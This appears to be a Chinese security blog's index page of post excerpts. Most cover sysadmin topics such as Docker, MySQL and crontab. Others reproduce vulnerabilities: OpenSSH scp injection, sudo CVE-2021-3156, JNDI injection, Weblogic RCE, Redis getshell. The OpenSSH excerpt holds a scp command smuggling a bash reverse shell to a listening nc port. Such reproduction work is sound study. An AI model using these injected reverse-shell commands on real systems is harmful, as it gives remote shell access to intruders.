- 博客(28)
- 收藏
- 关注
RSS订阅原创 AlmaLinux 8上安装Docker
查看本机Linux发行版本[root@Alma_1 ~]# cat /etc/redhat-release AlmaLinux release 8.4 (Electric Cheetah)第 1 步:更新 AlmaLinux / Rocky Linux 8 系统通过将 AlmaLinux / Rocky Linux 8 系统操作系统包更新到最新版本来开始安装。sudo dnf -y update如果您有内核相关的更新,建议执行系统重启:sudo reboot第 2 步:添加 Docke
2021-08-21 13:39:21
2622
3
原创 (CVE-2020-15778)OpenSSH_8.3-命令注入漏洞复现
攻击方监听端口:#使用一个窗口开启nc进行监听nc -lvvp 7777#开启另一个窗口,上传反弹shell的命令scp dic.txt [email protected]:'`bash -i >& /dev/tcp/192.168.0.130/7777 0>&1`/tmp/attack.txt'更改默认shell命令设zsh为默认shell:chsh -s /bin/zsh设bash为默认shell: chsh -s /bin/bash问:不能用zsh反弹
2021-02-01 22:44:21
1976
原创 复现--Linux sudo权限提升漏洞(CVE-2021-3156)
前言网上已经有了很多的相关复现文章,但是还是有一些疑问,比如:普通用户如果有sudo权限的话,已经可以执行root用户能执行的命令,再去提权好像意义不大环境准备华为云VPS(Ubuntu 18.04.4 LTS、Sudo version 1.8.21p2)创建新用户test-1(无sudo权限)下载大佬的EXP(没办法,自己太菜了)开始提权test-1@dreamer:/home$ cd test-1/test-1@dreamer:~$ lsCVE-2021-3156
2021-01-31 22:28:19
2127
2
原创 JNDI注入辅助工具
简介一、Rogue JNDI简介用于JNDI注入攻击的恶意LDAP服务器。项目地址:https://github.com/veracode-research/rogue-jndi该项目包含LDAP和HTTP服务器,用于利用默认情况下不安全的Java JNDI API。 为了进行攻击,您可以在本地启动这些服务器,然后在易受攻击的客户端上触发JNDI解析,例如:InitialContext.doLookup("ldap://your_server.com:1389/o=reference");它
2021-01-26 15:51:32
9608
2
原创 Weblogic LDAP 远程代码执行漏洞(CVE-2021-2109)
CVE-2021-2109 Weblogic Server远程代码执行漏洞影响范围WebLogic Server 10.3.6.0.0WebLogic Server 12.1.3.0.0WebLogic Server 12.2.1.3.0WebLogic Server 12.2.1.4.0WebLogic Server 14.1.1.0.0环境搭建这个怎么搭都行,推荐采用docker镜像,例如以下两个docker镜像采用vulhub/weblogic/CVE-2020-14882的镜像(
2021-01-26 02:18:43
1199
原创 Can‘t connect to local MySQL server through socket ‘/tmp/mysql.sock‘ (2)
数据库启动不了可能是你的硬盘没空间啦!!启动数据库报错:root@dream2:/root # mysql ERROR 2002 (HY000): Can't connect to local MySQL server through socket '/tmp/mysql.sock' (2)root@dream2:/root # systemctl start mysqlJob for mysql.service failed because the control process exited
2021-01-15 02:01:21
273
转载 Redis未授权getshell及修复方案
应用介绍简单点说就是一个日志型数据库,并有主从同步的功能(优化性能)。漏洞介绍默认配置下redis并没有设置密码,被攻击者恶意利用可以导致未授权访问,可以有多种利用方式:服务器权限被获取和数据删除、泄露、加密勒索、植入yam2 minerd 挖矿程序、watch-smartd挖矿木马等安装redisdocker run -itd --name redis-test -p 6379:6379 redis常用命令ping:检测是否连通且有权限执行命令info:读取Redis敏感数据keys:
2020-12-31 00:19:41
627
原创 multipart/form-data (一种POST 数据提交的方式)
首次接触multipart/form-data在试着写S2-061漏洞(cve-2020-17530)PoC的过程中,注意到vulhub复现该漏洞所用的数据包如下:(发送如下数据包,即可执行id命令)POST /index.action HTTP/1.1Host: localhost:8080Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (Windows NT 10.0;
2020-12-13 23:57:35
57233
转载 linux下mysql忘记密码解决方案
1.关闭mysql服务1.检查mysql服务是否启动,如果启动,关闭mysql服务ps -ef | grep -i mysql2.停止mysqlservice mysqld stop2.修改mysql的配置文件my.conf一般在/etc目录下,运行命令:vi /etc/my.cnf,编辑文件在文件的[mysqld]标签下添加一句:skip-grant-tables保存退出3.重启数据库运行命令:service mysqld start4.使用空的初始密码登录mysql运行命令
2020-12-06 21:28:27
115
原创 Python文件名与模块名冲突报错:TypeError: ‘module‘ object is not callable (SOCKET)
在写Python代码的时候,.py文件的名称不要跟系统模块名冲突,否则可能会出现import了错误的模块的情况(import文件本身?)下边是stackoverflow上的一个例子:执行socket.py脚本:import sockets=socket.socket()s.connect(("data.pr4e.org",80))cmd='GET http://data.pr4e.org/romeo.txt HTTP/1.0\n\n'.encode()s.send(cmd)while Tru
2020-12-04 08:13:32
892
原创 Ubuntu临时和永久修改ip地址掩码和网关
在终端修改指定网卡的ip地址,有临时修改和永久修改查看网卡信息终端输入 ifconfig 并回车,查看需要修改的网卡名称临时修改当重启电脑后,ip地址将恢复为原来的ip地址,此方法适合临时测试使用修改ip和子网掩码sudo ifconfig 网卡名 ip信息 netmask 掩码修改网关的方法(route -n查看网关)使用route命令修改网卡的网关信息sudo route add default gw 网关信息 网卡名永久修改1.修改配置文件永久修改需要对配置文件
2020-11-25 23:29:37
3691
原创 启动软件后界面模糊,分辨率低
问题:下载Fiddler首次启动,软件界面模糊(本机Win10的系统)解决方法:在.exe文件上右键——属性——兼容性——高dpi下禁用缩放(替代高dpi缩放行为)然后重新启动Fiddler,分辨率正常,舒服了。...
2020-11-08 17:14:29
1831
原创 Linux下将脚本变为可全局运行的方法
几种方法方法1(仅当前有效)例子:PATH=$PATH:/etc/apache/bin ##把/etc/apache/bin目录添加到PATH中使用这种方法,只对当前会话有效,也就是说每当登出或注销系统以后,PATH 设置就会失效方法2把脚本/可执行文件所在目录加到环境变量中修改环境变量,在bash下用export,在csh下用setenv例子:export PATH=$PATH:/usr/local/bin全局的是/etc/profile某个用户的就是 ~/.bash_p
2020-11-08 00:10:32
6677
原创 修改环境变量时,错误export之后导致linux所有命令无法使用
本想着将一个脚本加入到系统环境变量,方便执行,然后在/etc/profile文件中写入了错误的export语句,导致刷新后所有的命令都无法执行,vim都没办法用了(刚开始慌了),然后就想到可以在命令前边加上绝对路径执行,/usr/bin/vim /etc/profile...
2020-11-07 23:24:28
2696
3
原创 查找 apache httpd.conf 位置
1.find命令find / -name 'httpd.conf' -print2.输出apache版本信息(/usr/sbin)apachectl -Vhttpd -V结果如下:root@53edafde8599:/var/www/html/upload # apachectl -VAH00558: apache2: Could not reliably determine the server's fully qualified domain name, using 172.17.0
2020-10-15 15:04:19
9406
1
原创 crontab的安装和使用
cron工具简介:一、cron 服务的启动与关闭1、ubuntu安装cron2、centOS安装cron二、使用1、启动Cron服务2、使用Cron帮助3、命令格式4、命令功能5、对Cron作业进行列表显示6、编辑Cron作业7、移除Cron作业8、用Crontab计划任务9、crontab 文件格式三、crontab 的配置文件四、注意cron工具简介: cron是Linux系统中最有用的工具之一,cron作业是在指定时间到来时被调度执行的作业。 最常见的自动化系统管理和自动维护工作,比如每天.
2020-09-28 02:38:12
5465
原创 docker启动容器报错(iptables failed)
启动docker容器时报错:root@dreamer7:/root # docker run -it -p 80:80 vulnerables/web-dvwa docker: Error response from daemon: driver failed programming external connectivity on endpoint gifted_goldwasser (680172f14ce6eab20619aec805d71ce459c060292e5dbdffbfa2c1c3c
2020-09-17 09:09:01
5887
转载 JDK、JRE、JVM分别是什么及它们之间的有什么关联
Java程序是运行在JVM(Java虚拟机)上的,在开发程序之前要配置Java开发环境,而配置环境要做的就是JDK的安装和配置。三者的大致结构是这样的,简单来说就是JDK包含JRE,JRE又包含JVM的关系。如下图所示:JDK简单介绍JDK:Java Development Kit 是Java的标准开发工具包(普通用户只需要安装 JRE来运行 Java 程序。而程序开发者必须安装JDK来编译、调试程序)。它提供了编译、运行Java程序所需的各种工具和资源,包括Java编译器、Java运行环境JRE,
2020-09-05 19:18:34
115
转载 如何使用 FirewallD 开启 IP 白名单
FirewallD 开启 IP 白名单Firewalld 中的基本概念区域(zone)安装并启用防火墙熟悉当前的防火墙规则使用 Firewalld 配置 IP 白名单Firewalld 是可用于许多 Linux 发行版的防火墙管理解决方案,它充当 Linux 内核提供的 iptables 数据包过滤系统的前端。在本教程中,介绍如何为服务器设置防火墙,并使用 firewall-cmd 管理工具来管理防火墙添加 IP 白名单。Firewalld 中的基本概念区域(zone)区域(zone)基本上是一组
2020-09-05 14:36:15
12097
2
原创 windows下安装Apache+PHP+MySQL(WAMP)
1.下载apachehttp://httpd.apache.org/docs/current/platform/windows.html#down安装https://www.cnblogs.com/wcwnina/p/8044353.htmlcnblogs.com/wcwnina/p/8044353.html2.下载mysqlhttps://downloads.mysql.com/archives/installer/半天找不到64位的,后来才知道只是标注的32位,安装的时候可以选择6
2020-09-01 00:57:05
260
原创 2020/8/31--学到了什么
执行composer config repo.packagist composer https://packagist.phpcomposer.com报下面错误:File "./composer.json" cannot be found in the current directory解决:加上 -g [ --global ] 就可以了,用全局配置就不用去找 composer.json 文件了https://getcomposer.org/download/ThinkPHP 5.0.24
2020-09-01 00:21:26
165
转载 url拼接参数格式
url拼接参数格式在一些情况下,需要直接往url上拼接请求参数。例子:http://www.dreamerr.cn?flag=1&type=normal&role=customer通过上面的例子就可以看出第一个参数需要以【?】开头,然后是参数名,然后是【=】,然后是参数值。第二个参数开始则需要以【&】开头,然后是参数名,然后是【=】,然后是参数值。这就是url拼接参数的格式要求。另一种理解:当需要往url上拼接请求参数的时候,需要以【?】作为分隔符,在【?】分
2020-08-31 16:08:23
3070
原创 python3安装及配置环境变量+/etc/profile和/root/.bash_profile区别
1、依赖包安装yum -y install zlib-devel bzip2-devel openssl-devel ncurses-devel sqlite-devel readline-devel tk-devel gdbm-devel db4-devel libpcap-devel xz-devel libffi-devel2、下载包:wget https://www.python.org/ftp/python/3.8.1/Python-3.8.1.tgz3、解压:tar -zxvf P
2020-08-28 04:40:06
1260
1
转载 ThinkPHP环境的安装与配置
ThinkPHP是一个免费开源的,快速、简单的面向对象的轻量级PHP开发框架。严格来说,ThinkPHP无需安装过程,这里所说的安装其实就是把ThinkPHP框架放入WEB运行环境(前提是你的WEB运行环境已经OK),可以通过两种方式获取和安装ThinkPHP。下载ThinkPHP安装获取ThinkPHP的方式很多,官方网站(http://thinkphp.cn)是最好的下载和文档获取来源。官网提供了稳定版本的下载:http://thinkphp.cn/down/framework.html由于T
2020-08-27 23:46:27
891
转载 一些需要禁用的PHP危险函数(disable_functions)
为了安全我们需要禁掉一些PHP危险函数phpinfo()功能描述:输出 PHP 环境信息以及相关的模块、WEB 环境等信息。危险等级:中passthru()功能描述:允许执行一个外部程序并回显输出,类似于 exec()。危险等级:高exec()功能描述:允许执行一个外部程序(如 UNIX Shell 或 CMD 命令等)。危险等级:高system()功能描述:允许执行一个外部程序并回显输出,类似于 passthru()。危险等级:高chroot()功能描述:可改变当前 PHP 进
2020-08-27 23:06:00
355
原创 Docker容器设置端口映射的方法
概念Docker 端口映射即映射容器内应用的服务端口到本机宿主机器。#实现当容器中运行一些网络应用,要让外部访问这些应用时,可以通过 -P 或 -p 参数两种方式来指定端口映射。随机映射使用 -P 参数时,Docker 会随机映射一个端口到内部容器开放的网络端口,如下开启一个 nginx 服务:$ docker run -d -P nginxe93349d539119dc48dc841e117f6388d6afa6a6065b75a5b4aedaf5fb2a051fc$ $ docke
2020-08-25 10:34:49
33084
原创 vim编辑后无法保存出现E212:Can‘t open file for writing
问题vim编辑后无法保存出现E212:Can’t open file for writing原因分析:因为一次创建了文件夹同时创建了文件导致解决方案(一步一步来):先进目录创建文件夹进入新创建的文件夹创建文件...
2020-08-18 00:19:15
1452
原创 名词概念(记事本)
序列化:序列化 (Serialization)是将对象的状态信息转换为可以存储或传输的形式的过程。(通过ObjectOutputStream类的writeObject)反序列化:就是把字节流恢复为对象的过程(通过ObjectInputStream类的readObject()方法)RMI:远程方法调用(Remote Method Invocation)。简单来说,除了该对象本身所在的虚拟机,其他虚拟机也可以调用该对象的方法JRMP:Java远程消息交换协议JRMP(Java Remote Mes
2020-07-11 00:32:00
130
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人